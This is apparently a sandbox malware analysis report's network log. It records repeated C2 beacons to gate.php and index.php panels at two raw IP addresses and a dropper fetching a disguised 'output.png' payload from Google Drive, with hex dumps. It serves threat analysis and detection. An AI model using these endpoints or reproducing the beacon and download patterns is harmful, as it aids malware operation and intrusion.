Dec 12, 2024 16:50:41.013376951 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.10	50275	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:41.460043907 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:41.581305981 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:43.192471027 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.10	50287	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:43.415031910 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 12, 2024 16:50:44.557986975 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.10	50288	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:43.454822063 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:43.584964037 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:44.962646961 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:44 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.10	50294	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:45.220479012 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:45.346981049 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:46.655031919 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:45 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.10	50295	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:46.377274036 CET	306	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Dec 12, 2024 16:50:47.714988947 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.10	50296	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:46.913491011 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:47.034245968 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:48.475965977 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:47 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.10	50300	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:48.729895115 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:48.854419947 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:50.166421890 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:49 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.10	50301	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:49.557113886 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 12, 2024 16:50:50.896805048 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.10	50302	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:50.404855967 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:50.537748098 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:52.007617950 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:51 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.10	50311	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:52.246288061 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:52.370877981 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:53.722778082 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:52 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.10	50315	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:52.656989098 CET	306	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Dec 12, 2024 16:50:54.315164089 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.10	50316	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:53.958751917 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:54.079049110 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:55.567430973 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:54 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.10	50319	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:55.873969078 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:55.996365070 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:57.628992081 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.10	50323	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:56.988130093 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 12, 2024 16:50:58.110018015 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49870	216.58.208.238	443	8092	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:48:17 UTC	150	OUT	GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1 User-Agent: FileDownloader Host: drive.google.com Cache-Control: no-cache
2024-12-12 15:48:18 UTC	1319	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 12 Dec 2024 15:48:17 GMT Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'report-sample' 'nonce-s6-ID_3jO9o-vYeeCv0C8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49875	216.58.208.238	443	8120	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:48:19 UTC	150	OUT	GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1 User-Agent: FileDownloader Host: drive.google.com Cache-Control: no-cache
2024-12-12 15:48:20 UTC	1319	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 12 Dec 2024 15:48:19 GMT Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-YuWoytgscBVoPMmF5Kz6cw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49878	172.217.17.65	443	8092	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:48:19 UTC	192	OUT	GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1 User-Agent: FileDownloader Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-12 15:48:23 UTC	4915	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="output.png" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 156917 Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT X-GUploader-UploadID: AFiumC6RV2tztBC7afQxpc4kQnTnyCnDKLtKiDEe-Ge_-bnO1lNYd2IKU4Z9UBmudCpf55jCyt4 Date: Thu, 12 Dec 2024 15:48:23 GMT Expires: Thu, 12 Dec 2024 15:48:23 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=h6mvlQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 15:48:23 UTC	4915	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b6 00 00 01 b6 08 06 00 00 00 13 09 a3 70 00 00 80 00 49 44 41 54 78 9c ec dd 07 7c 14 65 fa 07 f0 df 33 9b 0a 09 bd 9d 15 44 20 64 77 36 80 d8 d0 53 9a dc 59 00 5b d6 ce a9 e7 e9 9d 05 b0 23 2a 4c c0 82 67 c5 72 96 bb bf 9e e8 a9 24 58 41 3d 95 66 c3 16 85 ec ec 12 8a 8a 9e 05 0b 9d 00 29 bb f3 fc 3f bb 49 ee 28 d9 64 76 b3 33 ef 6c f6 fd 7e 3e 7e 3e b2 bb 33 ef 93 64 77 9f 79 cb 3c 6f 06 24 49 b2 ce a8 d3 ba 82 c2 c7 2b 8c 61 0c 14 02 74 08 08 3d c0 68 0f 80 40 a8 02 d3 06 10 af 23 c6 2a 03 fc 11 80 25 58 f4 da cf a2 43 97 a4 54 45 a2 03 90 a4 36 67 cc 98 f6 08 e5 fa 88 30 01 c0 71 00 94 04 ce f2 11 13 3d 03 64 3e 87 85 65 5b 2d 88 52 92 da 2c 99 d8 24 29 59 4e 3c b1 03 ea 32 27 12 d3 24 00 dd 92 Data Ascii: PNGIHDRpIDATx\|e3D dw6SY[#Lgr$XA=f)?I(dv3l~>~>3dwy<o$I+at=h@#%XCTE6g0q=d>e[-R,$)YN<2'$
2024-12-12 15:48:23 UTC	4867	IN	Data Raw: b8 8f 6d b0 aa aa 13 4c 25 b5 58 26 5c bf 63 68 76 d7 cd 7b 27 b5 86 36 04 d4 e8 92 a4 ff 71 b9 5c 31 df 83 59 59 59 09 ed b7 e6 76 bb ab 54 55 d5 5c 2e 97 4a f1 d7 58 ed 07 60 7e 43 79 ae c2 44 da 97 12 27 13 9b 43 31 33 05 02 81 09 86 61 7c 19 b9 02 8c e3 8a b1 d1 97 cc ec f3 7a bd a3 54 55 4d ca 0e c1 2e 97 ab c9 2f 08 22 11 c5 27 25 e9 7f 9a 9b 63 ab ae ae 6e d5 46 a2 85 85 85 6b 3d 1e 8f cf 30 8c d1 09 ec 8e d1 58 9e 6b 76 79 79 79 c7 d6 c4 21 99 27 13 9b 03 05 02 81 c3 03 81 c0 32 66 7e 3a c1 31 fe 92 9c 9c 1c 8f d7 eb 4d 6a 25 ff 70 38 dc e4 17 84 ec b1 49 a2 35 d7 63 cb cd cd 4d ca 0e d9 45 45 45 8b 36 6c d8 30 84 99 2f 03 f0 6b 1c 87 66 02 98 98 9d 9d fd 95 ae eb 93 4a 4b 4b e5 e7 c5 62 32 b1 39 c8 aa 55 ab f6 6b 28 83 f5 09 80 a3 e2 3c dc 00 a2 Data Ascii: mL%X&\chv{'6q\1YYYvTU\.JX`~CyD'C13a\|zTUM./"'%cnFk=0Xkvyyy!'2f~:1Mj%p8I5cMEEE6l0/kfJKKb29Uk(<
2024-12-12 15:48:23 UTC	1323	IN	Data Raw: bb 53 a2 8c 51 20 10 18 bb 71 7b d5 a3 7f 7f 7b e9 fe cf bf ff 31 0c 13 c3 93 5d 3b e4 1b 63 06 b9 9f ef cf 35 17 6a 9a e6 8c 25 e4 a3 c6 17 82 30 48 61 2e 00 63 00 13 f6 03 a8 3d c0 1d 81 68 45 ff 1a 10 aa 86 f4 39 b8 5f df 5e 3d 3a 1c dc a3 1b 0e e9 d9 1d 45 bd 0f 42 7e 6e 4e a4 c7 36 d3 e3 f1 d8 ba 22 4f b8 52 2d 0b c0 53 00 9d 2b a0 f5 1d 60 f6 e1 2c ed 0d 01 6d ff 57 ea 24 b6 46 a5 33 fb 80 8d 1b 41 f8 03 80 9c 24 9c 31 08 c2 9d e0 81 2f a4 fb cd d7 66 04 02 81 a7 98 f9 c2 bd 1f 67 e6 81 5e af d7 f6 b1 f4 78 24 38 ec b8 25 72 2d bc 61 c3 86 47 46 8c 18 e1 8c 2f 7b 93 2a 2a 2a da 2b 8a 72 7d e0 bb 1f a6 ce 7a 71 41 a6 ff 1b 73 53 a0 9e 83 f6 af 3a a1 c8 f3 97 fb 26 5f fe ac e5 41 ee 6d ec d8 76 d8 49 a7 29 84 93 99 69 04 80 5e 89 9c 46 21 c2 c0 03 f6 Data Ascii: SQ q{{1];c5j%0Ha.c=hE9_^=:EB~nN6"OR-S+`,mW$F3A$1/fg^x$8%r-aGF/{***+r}zqAsS:&_AmvI)i^F!
2024-12-12 15:48:23 UTC	1390	IN	Data Raw: 64 c9 01 31 5f 38 fa d4 e1 44 ca 62 27 27 35 d4 6f 18 76 3e 6d aa 7b 13 27 9e d8 41 74 2c 52 eb a4 65 62 4b ab 6a 04 49 16 eb a2 40 51 14 5b 13 5b 45 45 c5 90 40 20 b0 ac 61 4b 19 b3 73 69 5f 30 73 a4 67 39 21 5d e6 d2 e2 e1 76 bb bf 54 55 f5 94 11 ea c0 71 2f df 34 e9 1b 33 7b bf ed aa ad c5 cb 1f 97 7b a7 fc df f3 df 4c 7b ec c9 07 96 2c 59 b2 67 f1 84 d1 e3 4e 26 e6 7f 03 e8 68 71 f8 49 c2 23 a9 36 eb 1d 99 dc 52 5b 5a 26 36 d9 63 4b 9c e8 1e 9b df ef ef ac eb fa 6c 45 51 3e 8d 63 2e 6d 33 80 c9 95 95 95 47 78 bd de 8f 2c 0e 31 e5 79 3c 9e f9 a1 ea ea c2 cb 7f 3f b2 64 de f5 57 d4 1c ef 1e d0 e2 31 5f ae ff d9 75 db bc d7 26 dd 31 ff ed 5f 1e 2d 7b e9 94 e8 83 23 c6 1f 49 4c 73 01 a4 da 3e 70 47 50 6d d6 ab 38 f1 c4 54 8b 5b 6a 60 45 69 2a c7 93 3d b6 Data Ascii: d1_8Db''5ov>m{'At,RebKjI@Q[[EE@ aKsi_0sg9!]vTUq/43{{L{,YgN&hqI#6R[Z&6cKlEQ>c.m3Gx,1y<?dW1_u&1_-{#ILs>pGPm8T[j`Ei*=
2024-12-12 15:48:23 UTC	1390	IN	Data Raw: fd 13 11 fd c1 ed 76 1f 2f 93 5a ea 61 d0 6f 45 c7 20 04 e3 38 d1 21 48 b1 a5 65 62 4b eb ca 23 44 97 88 f8 bb bf ba f5 3f 30 f6 dc ee 26 c4 cc f7 e7 e4 e4 0c f0 78 3c 73 88 28 0d 2f fc 53 5c fd ea c0 be a2 c3 10 41 01 62 de ce 22 89 97 96 43 91 69 dd 63 63 9c 26 a2 d9 f5 75 3b b1 b2 7a 0b 3c b9 9d 23 ff 5c 6a 18 c6 55 45 45 45 01 11 b1 48 49 b2 a1 ba 1f 6c de 39 dd 29 98 94 96 77 5f 95 84 49 cb c4 96 b6 3d b6 17 6f 3b 18 e1 70 6f 51 cd 2f db f9 f3 36 b5 5d 97 ab dc 6e f7 33 b2 87 d6 06 b8 70 68 fa 6e c1 c9 fd 44 47 20 c5 96 96 43 91 69 db 63 0b 87 3d 22 9b 7f fc d7 55 af cb 61 c7 36 c4 50 ba 88 0e 41 a0 74 fe d9 1d 2f 2d 13 5b da f6 d8 80 83 44 36 5e cb c6 7e 22 db 97 92 8c 90 2f 3a 04 81 da a1 b8 38 2d 87 61 53 41 5a 26 b6 b4 ed b1 11 89 fe 22 6a 7d 2d Data Ascii: v/ZaoE 8!HebK#D?0&x<s(/S\Ab"Cicc&u;z<#\jUEEEHIl9)w_I=o;poQ/6]n3phnDG Cic="Ua6PAt/-[D6^~"/:8-aSAZ&"j}-
